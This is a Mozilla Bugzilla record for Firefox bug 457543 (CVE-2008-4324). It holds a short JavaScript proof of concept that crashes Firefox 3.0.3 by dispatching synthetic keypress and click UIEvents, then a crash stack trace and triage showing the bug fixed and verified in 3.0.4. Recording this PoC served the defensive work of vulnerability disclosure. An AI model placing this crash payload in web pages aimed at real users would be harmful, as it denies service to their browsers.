Bug 457543 (CVE-2008-4324)

FireFox Crashed , Unhandle User Interface Dispatcher Events

VERIFIED FIXED

Status

()

Core
DOM: Events
--
critical
VERIFIED FIXED
9 years ago
9 years ago

People

(Reporter: Aditya K Sood, Unassigned)

Tracking

({verified1.9.0.4})

1.9.0 Branch
verified1.9.0.4
Points:
---
Bug Flags:
blocking1.9.0.4 +
wanted1.8.1.x -

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:dupe 454820], URL)

(Reporter)

Description

9 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.30 Safari/525.13
Build Identifier: Mozilla 3.0.3

Mozilla 3.0.3 Crashes with unhandled exception in User Interface Dispatcher Events. If a user try to restore session 3.0.3 version it still gives a crash.

Reproducible: Always

Steps to Reproduce:
<script language = "JavaScript">
var moz303 = document.createEvent("UIEvents");

moz303.initUIEvent("keypress", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
	document.documentElement.dispatchEvent(moz303);
}


moz303.initUIEvent("click", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
	document.documentElement.dispatchEvent(moz303);
}
</script>

The smaller POC Code.
Actual Results:  
The Mozilla Crashes Straight Forward.

Expected Results:  
The software should have handle the exception a with some check introduced to user.

The Bug is getting replicated Everytime.
(Reporter)

Updated

9 years ago
Severity: normal → critical
CC list accessible: false
Version: unspecified → 3.0 Branch
I see this on Linux as well, on 3.0 but not on mozilla-central.
OS: Windows XP → All
Hardware: PC → All
(Reporter)

Comment 2

9 years ago
But its really hitting 3.0.3 as per detials provided above.

Need to be fixed.
Also confirming crash in 3.0, does not affect Firefox 2. This looks like a null-deref Denial of Service and could probably be safely unhidden, but I'd like Olli or someone else who knows events to check it out.

Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000007
Crashed Thread:  0

    Thread 0 Crashed:
0   libxpcom_core.dylib           nsTArray_base::Length() const + 11 (nsTArray.h:66)
1   libgklayout.dylib             nsContentUtils::GetAccelKeyCandidates(nsIDOMEvent*, nsTArray<nsShortcutCandidate>&) + 261 (nsContentUtils.cpp:4083)
2   libgklayout.dylib             nsXBLKeyEventHandler::HandleEvent(nsIDOMEvent*) + 159 (nsXBLEventHandler.cpp:173)
3   libgklayout.dylib             nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsISupports*, unsigned int) + 595 (nsEventListenerManager.cpp:1080)
4   libgklayout.dylib             nsEventListenerManager::HandleEvent(nsPresContext*, nsEvent*, nsIDOMEvent**, nsISupports*, unsigned int, nsEventStatus*) + 1119 (nsEventListenerManager.cpp:1186)
5   libgklayout.dylib             nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&, unsigned int) + 396 (nsEventDispatcher.cpp:211)
6   libgklayout.dylib             nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&, unsigned int, nsDispatchingCallback*) + 714 (nsEventDispatcher.cpp:293)
7   libgklayout.dylib             nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&, unsigned int, nsDispatchingCallback*) + 943 (nsEventDispatcher.cpp:323)
8   libgklayout.dylib             nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*) + 1640 (nsEventDispatcher.cpp:483)
9   libgklayout.dylib             nsEventDispatcher::DispatchDOMEvent(nsISupports*, nsEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) + 350 (nsEventDispatcher.cpp:541)
10  libgklayout.dylib             nsEventListenerManager::DispatchEvent(nsIDOMEvent*, int*) + 274 (nsEventListenerManager.cpp:1310)
  ...etc...
Component: Security → DOM: Events
Product: Firefox → Core
QA Contact: firefox → events
Whiteboard: [sg:investigate] null-deref DoS?
Version: 3.0 Branch → 1.9.0 Branch
Status: UNCONFIRMED → NEW
Ever confirmed: true
qawanted: would it be possible to figure out a "fix range" on 3.1 nightlies? maybe we can find a patch that fixed this (if it wasn't a "re-write everything" type change).
Keywords: qawanted
Whiteboard: [sg:investigate] null-deref DoS? → [sg:investigate] null-deref DoS? Fix range?

Comment 5

9 years ago
Didn't Mats just fix this or a variant of this.

Comment 6

9 years ago
(In reply to comment #5)
> Didn't Mats just fix this or a variant of this.
Bug 454820
(Reporter)

Comment 7

9 years ago
so whats an actual update. I think I have given specific version 3.0.3 and the

version details are:

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
(Reporter)

Comment 8

9 years ago
Let me know the specifications about Fix

Comment 9

9 years ago
I meant the fix is in the latest nightly builds (feel free to try http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/).
It will be ported to 3.0.x builds.
(Reporter)

Comment 10

9 years ago
Let me know the specifications about Fix
(Reporter)

Comment 11

9 years ago
Last query when exactly will it be ported , to 3.0.x builds.
Status: NEW → RESOLVED
Last Resolved: 9 years ago
Keywords: qawanted
Resolution: --- → DUPLICATE
Whiteboard: [sg:investigate] null-deref DoS? Fix range? → [sg:dupe 454820]
Duplicate of bug: 454820
CC list accessible: true
(Reporter)

Comment 13

9 years ago
If it was resolved previously why not it is ported to 3.0.3 version.
(Reporter)

Comment 14

9 years ago
If it was resolved previously why not it is ported to 3.0.3 version.
(Reporter)

Updated

9 years ago
Resolution: DUPLICATE → WONTFIX
It was found and fixed in our "development" version that will become 3.1, general development does not happen on the 3.0.x branch. This was only fixed a couple of weeks ago (Sept 15) after 3.0.2 was in testing. 3.0.3 was a quick turn-around release to fix a broken password manager and took only that fix. 

3.0.4 will be the earliest possible release vehicle for this fix, but the fix needs to be tested to make sure it does not have unintended side effects. Fixing the symptoms turns out to be the easy part, fixing bugs so that they don't cause compatibility problems and break websites is sometimes trickier.
This has been posted to milw0rm:
http://www.milw0rm.com/exploits/6614

I'm going to put the milw0rm reference in the URL field and remove the security flag to forestall duplicate filings.
Original URL was: http://www.secniche.org/moz303
Resolution: WONTFIX → DUPLICATE
Duplicate of bug: 454820
Flags: wanted1.8.1.x-
Flags: blocking1.9.0.4+
This bug is fixed in nightlies by bug 454820, will be fixed in 3.0.4
Depends on: 454820
Resolution: DUPLICATE → FIXED

Updated

9 years ago
Alias: CVE-2008-4324

Updated

9 years ago
Duplicate of this bug: 457851
(In reply to comment #18)
> This bug is fixed in nightlies by bug 454820, will be fixed in 3.0.4

Adding the fixed1.9.0.4 keyword then. :)
Keywords: fixed1.9.0.4
This is verified fixed for 1.9.0.4 with Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4pre) Gecko/2008102304 GranParadiso/3.0.4pre.
Status: RESOLVED → VERIFIED
Keywords: fixed1.9.0.4 → verified1.9.0.4
You need to log in before you can comment on or make changes to this bug.